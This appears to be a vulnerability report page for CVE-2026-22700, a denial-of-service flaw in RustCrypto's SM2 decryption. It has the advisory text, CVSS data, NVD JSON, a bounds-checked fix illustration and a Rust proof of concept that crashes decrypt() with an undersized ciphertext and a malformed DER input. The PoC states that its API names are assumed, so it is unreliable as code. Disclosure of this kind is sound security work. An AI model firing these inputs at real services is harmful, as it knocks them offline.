Security Vulnerability Report
CVE-2026-22700 CVSS 7.5 HIGH

CVE-2026-22700

Published: 2026-01-10 06:15:53
Last Modified: 2026-01-22 14:53:48

Description

RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a denial-of-service vulnerability exists in the SM2 public-key encryption (PKE) implementation: the decrypt() path performs unchecked slice::split_at operations on input buffers derived from untrusted ciphertext. An attacker can submit short/undersized ciphertext or carefully-crafted DER-encoded structures to trigger bounds-check panics (Rust unwinding) which crash the calling thread or process. This issue has been patched via commit e60e991.
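The bug class described above, a length-dependent slice::split_at on attacker-controlled ciphertext, shown beside the bounds-checked form that returns an error instead of unwinding; this is an added illustration, not the sm2 crate's code, and the C1 || C3 || C2 layout and field sizes are assumptions made for it.

```rust
use std::panic;

// Field sizes of an SM2-style C1 || C3 || C2 ciphertext, assumed for this
// illustration (uncompressed point, SM3 digest); not the sm2 crate's code.
const C1_LEN: usize = 65;
const C3_LEN: usize = 32;

/// Vulnerable pattern: slice::split_at panics when `mid > len`, so an
/// undersized ciphertext from the network unwinds the calling thread.
fn split_ciphertext_unchecked(ct: &[u8]) -> (&[u8], &[u8], &[u8]) {
    let (c1, rest) = ct.split_at(C1_LEN);
    let (c3, c2) = rest.split_at(C3_LEN);
    (c1, c3, c2)
}

#[derive(Debug, PartialEq)]
enum CiphertextError {
    TooShort { need: usize, got: usize },
    BadPointTag(u8),
}

/// Hardened pattern: check the length (and the C1 point tag) before any
/// split and report malformed input as an error instead of panicking.
fn split_ciphertext_checked(ct: &[u8]) -> Result<(&[u8], &[u8], &[u8]), CiphertextError> {
    let need = C1_LEN + C3_LEN + 1; // at least one byte of C2
    if ct.len() < need {
        return Err(CiphertextError::TooShort { need, got: ct.len() });
    }
    let (c1, rest) = ct.split_at(C1_LEN);
    if c1[0] != 0x04 {
        return Err(CiphertextError::BadPointTag(c1[0]));
    }
    let (c3, c2) = rest.split_at(C3_LEN);
    Ok((c1, c3, c2))
}

/// True when the unchecked parser panics on `ct` (a crashed worker thread
/// from the caller's point of view).
fn unchecked_panics(ct: &[u8]) -> bool {
    panic::catch_unwind(|| { let _ = split_ciphertext_unchecked(ct); }).is_err()
}

fn main() {
    // Constructed input: the two-byte ciphertext from the report.
    let short = [0x00u8, 0x01];
    println!("unchecked panics: {}", unchecked_panics(&short));
    println!("checked result: {:?}", split_ciphertext_checked(&short));
}
```

In a service, the checked variant turns the crash into a rejected request; the same effect can be had with the standard library's split_at_checked on Rust 1.80 or later.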

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:pre0:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:rc0:*:*:*:rust:*:* - VULNERABLE
RustCrypto: Elliptic Curves 0.14.0-pre.0
RustCrypto: Elliptic Curves 0.14.0-rc.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```rust
// CVE-2026-22700 PoC - SM2 PKE Decrypt DoS
// Affected: RustCrypto elliptic-curves (sm2) 0.14.0-pre.0 and 0.14.0-rc.0;
// fixed by commit e60e991.
// The crate and type names below are as given in this PoC and are assumed to
// resolve to the SM2 PKE API; SecretKey and OsRng were missing from the
// original imports and are added here.
use sm2pke256v1::{DecryptingKey, PublicKey, SecretKey};
use rand_core::OsRng;

fn trigger_dos_via_short_ciphertext() {
    // Generate a valid key pair first
    let secret_key = SecretKey::random(&mut OsRng);
    let _public_key = PublicKey::from(&secret_key);

    // Create a short/undersized ciphertext to trigger the panic.
    // The decrypt function expects a certain minimum length;
    // providing shorter data causes slice::split_at to panic.
    let short_ciphertext = b"\x00\x01"; // Too short for SM2 decryption
    let decrypt_key = DecryptingKey::from(&secret_key);

    // This will trigger a panic due to the unchecked split_at
    let _result = decrypt_key.decrypt(short_ciphertext);
}

fn trigger_dos_via_malformed_der() {
    // Create a malformed DER-encoded structure
    // that causes an incorrect offset calculation in parsing
    let malformed_ciphertext = vec![
        0x30, 0x00,                   // SEQUENCE with zero length
        0x02, 0x01, 0x01,             // INTEGER
        0x30, 0x03, 0x02, 0x01, 0x02,
    ];
    let secret_key = SecretKey::random(&mut OsRng);
    let decrypt_key = DecryptingKey::from(&secret_key);

    // Trigger panic via malformed structure
    let _result = decrypt_key.decrypt(&malformed_ciphertext);
}

fn main() {
    // Each call panics on an affected version, so the process terminates at
    // the first one; run the second on its own to reproduce the DER case.
    trigger_dos_via_short_ciphertext();
    trigger_dos_via_malformed_der();
}

// Note: This PoC demonstrates the vulnerability concept.
// Actual exploitation requires specific knowledge of the SM2 PKE format.
// The patch (commit e60e991) adds bounds checking before split_at calls.
```

References

https://github.com/RustCrypto/elliptic-curves/commit/e60e99167a9a2b187ebe80c994c5204b0fdaf4ab (Patch)
https://github.com/RustCrypto/elliptic-curves/pull/1603 (Patch)
https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-j9xq-69pf-pcm8 (Exploit, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22700",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T06:15:52.517",
    "lastModified": "2026-01-22T14:53:48.393",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a denial-of-service vulnerability exists in the SM2 public-key encryption (PKE) implementation: the decrypt() path performs unchecked slice::split_at operations on input buffers derived from untrusted ciphertext. An attacker can submit short/undersized ciphertext or carefully-crafted DER-encoded structures to trigger bounds-check panics (Rust unwinding) which crash the calling thread or process. This issue has been patched via commit e60e991."},
      {"lang": "es", "value": "RustCrypto: Curvas Elípticas es soporte de Criptografía de Curva Elíptica (ECC) de propósito general, incluyendo tipos y rasgos para representar varias formas de curvas elípticas, escalares, puntos y claves públicas/secretas compuestas de ellos. En las versiones 0.14.0-pre.0 y 0.14.0-rc.0, existe una vulnerabilidad de denegación de servicio en la implementación de cifrado (PKE) de clave pública SM2: la ruta decrypt() realiza operaciones slice::split_at sin verificar en búferes de entrada derivados de texto cifrado no confiable. Un atacante puede enviar texto cifrado corto/subdimensionado o estructuras codificadas en DER cuidadosamente elaboradas para activar pánicos de verificación de límites (desenrolle de Rust) que bloquean el hilo o proceso que realiza la llamada. Este problema ha sido parcheado mediante el commit e60e991."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]},
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:pre0:*:*:*:rust:*:*", "matchCriteriaId": "5F5BCFE9-1585-4A90-857F-7F9E1B9C9ADA"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:rc0:*:*:*:rust:*:*", "matchCriteriaId": "B584C50F-8ED4-45F4-8799-7CCFE8D4DF66"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/RustCrypto/elliptic-curves/commit/e60e99167a9a2b187ebe80c994c5204b0fdaf4ab", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/RustCrypto/elliptic-curves/pull/1603", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-j9xq-69pf-pcm8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]},
      {"url": "https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-j9xq-69pf-pcm8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}
    ]
  }
}
```